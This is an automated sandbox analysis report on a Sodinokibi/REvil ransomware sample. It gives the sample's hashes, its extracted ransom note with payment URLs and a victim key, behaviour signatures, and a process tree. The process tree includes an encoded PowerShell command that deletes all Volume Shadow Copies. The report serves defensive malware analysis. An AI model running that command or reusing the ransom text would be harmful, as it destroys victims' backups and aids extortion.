Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    17-04-2024 12:56

General

  • Target

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe

  • Size

    166KB

  • MD5

    44c753ed1faec948b0d98bc9ba047469

  • SHA1

    1aa2d575752dcfa73ea8bd2fa666e18588be353c

  • SHA256

    6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01

  • SHA512

    f7d4c3988f82839264e83c1a17024c695bd8ff31a224eba3cfc9e3712758be5450521c1e52c246b02dad0849bdf381ad40d77e9b5bab6f8135f07219c13047e0

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QoIeXt5KCn16:ZJ0BXScFy2RsQJ8zg9edTn1

Score
10/10

Malware Config

Extracted

Path

C:\Users\elkl8r-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion elkl8r. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4502784476E21C0 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B4502784476E21C0 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: pjPn/MmzlxCI6TLT5m4Q6GBoI3A98lcrII1VEcAnmj3f185he7t0KHgIlmMK3VpU W87Mr5GWmBH6fGlvf286flCi0Kh7eg586mCza12n1osJh9Qy6yNp3GiHlnai1XkW 3Br14pVVzoJ0a+5u2Mpa+YIqM/+CKiiU/9mo5aFrP5kyOrAdyZLcWx5xfACZhzeN mm4xuMB61SnnP2bKglnCKILO2kz978kL4FJqUmR5GtQa5ehpgkgBKHXTQGt3bUvO DYjX/uzEu4Fm2+aIPyz/xmVGOUZ3hv8U6Ki0yxP6fAW1+xKyvb46ASSCiCLu73i6 LAxrvOb6B5GD6AHIJBL5vl6PsolRHqdDWLi+uBpTfeUhzmXnVJzpfPMLAil/9JKe e3Z2vIzHWyBNXLiz8N3rlERk4GL76yYhQidq59H7J368YV80w0TLyK0JsuFT1g/O lijk4Aw7gBo1Sq2mWZ5y0IB/+nuv5YZc70n5aQgRPKR7kUB+829MO0WA5Bfy1Q5S O+RdSn3GnmwLwg19NaNG4MvZ9WsKglBKz+1NSyKqQpfMx1XQcE0Xzlb1Xwf+r8BA 7OACR/R07r8hCN+StMO6meVeRw9RStnUUGFOpVaxjGxCngXETsQhSkHWxsTLn1Rr 9DlGm7scOwKVZ6z15tVnWe811//XYVdXKcYmYLT6Xa2yHwkHfuW8qpXnxaglLf4z cnBmEZB2VMSl5A8ayi+pDFh8UCNsQc1qvgS8IoeEBwyIjiRA9knRmf4Ql/XHUglD 7s32sETWJNjkV0KFSOw9a01Qk1KWQQjwNEnS9lUKkiV/3RBU3LdZojtkVmYVM75w G0fgKzDE1Ua2nXY0BhuCCGLJ+cC0BKrD0yZc1v9wbzrlRy3wdpku8SdIJsoLQcmE HCOXMOWVMz909v6TG4uVIP8tbHEawmDZcqmS+Rz1Yt42kzkOCQIKhpDjZGqAui0T PaMb+5qQ4Dh3fWRj8SR+szkigMpnU2f7y4wXbBSktaqrr/nUDK+z6KdINQmwMkJJ dfNtghzseVJWvbD98wqiQt6s0HIp6JbhPG5vI6Z/b6tlpVdLSQGD0qiC0Tlwo6+F NRVL05ml06leR4EtvjiV9BWetTlQIkYsKomGn6g9YCJ/CDKmGXQazbuz6MqjOWVx G6deCwHx7s2VbEgEBTfCW71BttTcgqHyDCOiIU5EuGmyVGy1qayFEhWkLk8QZt1h VEeeSIWHXK4e3fPpjb/65HRZl0rdcPCOWdpmX0rwroKTHG4LCh3J35Y5x6Gj7nfe u1ajLC87ySARtT7ptbeCvJb9Ie4SpS0xRp28gwEdYyTjL6J2BR4EptlyFXxW1Vln vOwftW9qzwjpEVpOwzwzeVZO2qVGvYdwOm9fBTOx Extension name: elkl8r ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B4502784476E21C0

http://decryptor.cc/B4502784476E21C0

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe
    "C:\Users\Admin\AppData\Local\Temp\6628de7ffbbe168a4fa9ff0a1a29b54e88a32e5963db0dd1aea4b80102c8ce01.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1508
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:3004
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2724

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\elkl8r-readme.txt

    Filesize

    6KB

    MD5

    30bcfc51ae1d4f7aadefb42fc9139fdb

    SHA1

    34345c4f5f1ec6e092d76849db7a76f659ccbb12

    SHA256

    2ebee9a206311782deab37d16fb761e1b87329e88fd3b98c16ae7be17d7443d3

    SHA512

    f1b720852be65201032c33306fca1fa91c7a678d3cf89dca09b422b262473c72aa8254048ab67170855593d06174d6fa709a74bcb92fb8174a0a6ffd523444fb

  • memory/1508-4-0x000000001B490000-0x000000001B772000-memory.dmp

    Filesize

    2.9MB

  • memory/1508-6-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/1508-5-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1508-7-0x0000000002810000-0x0000000002890000-memory.dmp

    Filesize

    512KB

  • memory/1508-8-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

    Filesize

    9.6MB

  • memory/1508-10-0x0000000002810000-0x0000000002890000-memory.dmp

    Filesize

    512KB

  • memory/1508-9-0x0000000002810000-0x0000000002890000-memory.dmp

    Filesize

    512KB

  • memory/1508-11-0x0000000002810000-0x0000000002890000-memory.dmp

    Filesize

    512KB

  • memory/1508-12-0x000007FEF5C20000-0x000007FEF65BD000-memory.dmp

    Filesize

    9.6MB